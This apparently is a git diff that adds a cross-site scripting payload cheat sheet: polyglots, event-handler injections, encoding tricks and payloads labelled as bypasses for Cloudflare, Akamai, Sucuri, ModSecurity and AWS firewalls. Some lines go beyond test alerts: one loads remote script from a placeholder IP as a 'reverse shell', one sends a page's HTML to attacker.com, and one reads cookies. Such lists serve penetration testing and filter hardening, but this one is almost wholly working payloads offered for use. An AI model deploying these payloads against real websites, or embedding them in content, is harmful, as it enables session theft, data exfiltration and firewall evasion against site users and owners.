Update \"}));booq

///"}));booq

@@ -0,0 +1,284 @@
+
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+Hi'&gt;"<script src="//xss-server"></script><x="{9*9}\r\n%0a%09%0d<svg\onload=confirm(1)>
+<x/onclick=alert``>
+"><img src onerror=alert(1)>
+<--`<img/src=` onerror=alert(3)> --!>
+" autofocus onfocus=alert(4) fragment="
+" onclick=alert`5` fragment="
+<details/open ontoggle=alert(6)>
+<svg/onload=alert`7`>
+><svg/onload=confirm``>"@yahoo.com
+</div><img/**/src/**/onerror=alert(1)>
+<Svg%K9OnLoad=%7Krompt%6K1%6K>
+"'`><svg/onload=alert`1234`>
+
+𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
+𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
++(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
++𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
+
+
+<script>setInterval(function(){d=document;z=d.createElement("script");z.src="//IP:PORT";d.body.appendChild(z)},0)</script>  ==> reverse Shell
+<iframe/src=j%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0t:prompt `1`> --> test it
+"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> --> ModSecurity bypass
+
+javascript:alert(1)
+'-alert(1)-'
+'-alert(1)//
+`-alert(1)//\
+\'-alert(1)//
+'}alert(1);{'
+'}alert(1)%0A{'
+\'}alert(1);{//
+\u0027-confirm`1`-\u0027 
+"; ||confirm('XSS') || "
+'*prompt(1)*'
+${alert(1)}
+{{32*32}}
+
+
+""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y
+"])},alert(1));(function xss() {//
+'?prompt`1`?'
+" onmouseover=alert(/@darknetguy/)
+" onclick=alert(1)//">click
+" autofocus onfocus=alert(1) "
+" onfocus=prompt(1) autofocus fragment="
+" onfocus=prompt(1) onmouseover="confirm(1) " style="position:absolute;width:100%;height:100%;top:0;left:0;"
+" onmousemove=alert(/@darknetguy/)//">Milad
+
+"><svg onload=alert(1)>.gif
+http://www.<svg/onload=ConFirm`1`>.com
+"><svg/onload=confirm(1)>"@yahoo.com
+
+<form action=javascript:alert(1)//
+<form><button formaction=javascript&colon;alert(1)>xss
+<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
+<form id="test" /><button form="test" formaction="javascript:alert()">xss
+
+<object data="data:text/html,<script>alert(5)</script>">
+<iframe srcdoc="<svg onload=alert(4);>">
+<object data=javascript:alert(3)>
+<iframe src=javascript:alert(2)>
+<embed src=javascript:alert(1)>
+
+<iframe src='jAvAsCripT:(alert)()'></iframe>
+<script%20~~~>\u0061\u006C\u0065\u0072\u0074``</script%20~~~>
+<?tag x="-->" test="<img src=x onerror=alert(1)//">
+
+bypass alert filter:
+(alert)(1)
+a=alert,a(2)
+[3].find(alert)
+al\u0065rt(4)
+alert`5`
+[6].map(alert)
+[7].every(alert)
+[8].filter(alert)
+[9].findIndex(alert)
+[10].forEach(alert)
+self['alert'](11)
+parent['alert'](12)
+window['alert'](13)
+
+
+Wordfence 7.4.2
+<a href=&#01javascript:alert(1)>
+
+Sucuri CloudProxy (POST only)
+<a href=javascript&colon;confirm(1)>
+
+ModSecurity CRS 3.2.0 PL1
+<a href="jav%0Dascript&colon;alert(1)">
+
+
+
+<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
+<script>eval(location.hash.slice(2))</script>    and end of url ==> #alert("testtesttestets")
+
+<script>
+x='<%'
+</script> %>/
+alert(2)
+</script>
+
+/<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> ---> cloudflare {`XSS´} «byPASS»
+/<svg%0Aonauxclick=0;[1].some(confirm)//
+
+
+
+<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">   ===> send current page's source to attacker site
+
+
+  ===> use < diffrent way
+
+
+">'><details/open/ontoggle=confirm('XSS')>   ===> maybe WAF bypasser (Test it)
+
+
+<object/data="javascript&colon;alert/**/(document.domain)">//   ===>  Bypass CloudFront WAF
+
+%3c<aa+ONLOAD+href=javasONLOADcript:promptONLOAD(1)%3e ===> maybe WAF bypasser (Test it)
+
+<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)">   ===>  maybe WAF bypasser (Test it)
+
+"><input/onauxclick="[1].map(prompt)">   ==> Sucuri WAF XSS bypass 
+
+<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>    ===> CloudFront XSS bypass
+
+1'"><img/src/onerror=.1|alert``>   ===>  Cloudflare #XSS #Bypass via dot
+<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
+<select><noembed></select><script x=’a@b’a>y=’a@b’//a@b%0a\u0061lert(1)</script x>
+<a+HREF=’%26%237javascrip%26%239t:alert%26lpar;document.domain)’>
+
+<!--><svg onload=alert(1)-->    ===> bypass if comments are allowed
+<svg onload="alert(1)" <="" svg=""
+<svg onload=alert(1)//
+
+<sVg/oNloAd=”JaVaScRiPt:/**\/*\’/”\eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”>
+<iframe src=jaVaScrIpT:eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))>
+
+
+** 𝗔𝗸𝗮𝗺𝗮𝗶 [𝗞𝗢𝗡𝗔 𝗦𝗶𝘁𝗲 𝗗𝗲𝗳𝗲𝗻𝗱𝗲𝗿] 𝗪𝗔𝗙 𝗕𝘆𝗽𝗮𝘀𝘀 **
+<tiger/onpointerrawupdate=this['innerHTML']=unescape(location.hash);>XSS Me#<img src=x onerror=alert(0)>
+
+
+<a href=”j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this[‘document’][‘cookie’]&rpar;”>X</a>  ==> Cloudflare Bypass 
+
+javascript:”/*’/*`/* →<html \” onmouseover=/*&lt;svg/*/onload=alert()//> 
+
+<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>    ===> Akamai waf bypass
+
+</script><svg><script>alert(1)%0A-->   ===> It must land where JS syntax is not affected though
+<link rel=import href='.&#47"><svg%20onload=alert(domain)>'>
+<iframe src="javascript:alert(1)%%0D3C!--
+<iframe src="javascript:alert(1)%%0D3C--
+
+"><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
+<--` <body/onload=&lt;!--&gt;&#10alert(1)> --!>
+i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\'a\le\r\t\(\1\)\'\s\rc\=\'e\'\20\>{
+<script src=data:,alert(1)>
+https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
+x”</title><img src%3dx onerror%3dalert(1)>
+<IMG SRC=javascript:alert(&quot;XSS&quot;)>
+/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
+<dETAILS%0Aopen%0AonToGgle%0A=%0Aa=prompt,a() x>
+<svg onunload=http://window.open('javascript:alert(1)')>
+
+
+XSS'\x22"%22>4<%\u0022/* ===> locator!
+
+<ScRiPt src=https://yoursite.com/XSS.js>
+
+<style/onload=alert(0)>
+
+%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)  ==> injecting into src attributes, you need a javascript URI payload
+
+  ===>  AWS WAF bypass
+
+{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}  ==> cloudflare «XSS» payload to bypass protection
+
+IE weird behavior:
+<iframe id=element></iframe>
+<script>
+element.alert(1)
+</script>
+
+parentheses free payload by @aemkei
+<script>
+onload=setTimeout
+Event.prototype.toString=
+_=>"alert\501\51"
+</script>
+
+
+<</div>script</div>>alert()<</div>/script</div>>
+
+<</div> %3c script</div>>alert()<<</div>/script</div>
+
+</ScRiPt><img src=something onauxclick="new Function `al\ert\`xss\``">
+#Akamai #Bypass #XSS #BugBounty
+Found a working #xss payload after a brainstorming for a long #time. 
+#Tested in many sites with alexa ranking below #1000
+
+Cloudflare WAF working again...
+Dec: <svg onload=prompt%26%230000000040document.domain)>
+Hex: <svg onload=prompt%26%23x000000028;document.domain)>
+
+
+One to bypass Cloudflare WAF by @JacksonHHax
+ <svg onload=alert%26%230000000040"1")>
+
+
+
+<
+%3C
+&lt
+&lt;
+&LT
+&LT;
+&#60
+&#060
+&#0060
+&#00060
+&#000060
+&#0000060
+&#60;
+&#060;
+&#0060;
+&#00060;
+&#000060;
+&#0000060;
+&#x3c
+&#x03c
+&#x003c
+&#x0003c
+&#x00003c
+&#x000003c
+&#x3c;
+&#x03c;
+&#x003c;
+&#x0003c;
+&#x00003c;
+&#x000003c;
+&#X3c
+&#X03c
+&#X003c
+&#X0003c
+&#X00003c
+&#X000003c
+&#X3c;
+&#X03c;
+&#X003c;
+&#X0003c;
+&#X00003c;
+&#X000003c;
+&#x3C
+&#x03C
+&#x003C
+&#x0003C
+&#x00003C
+&#x000003C
+&#x3C;
+&#x03C;
+&#x003C;
+&#x0003C;
+&#x00003C;
+&#x000003C;
+&#X3C
+&#X03C
+&#X003C
+&#X0003C
+&#X00003C
+&#X000003C
+&#X3C;
+&#X03C;
+&#X003C;
+&#X0003C;
+&#X00003C;
+&#X000003C;
+\x3c
+\x3C
+\u003c
+\u003C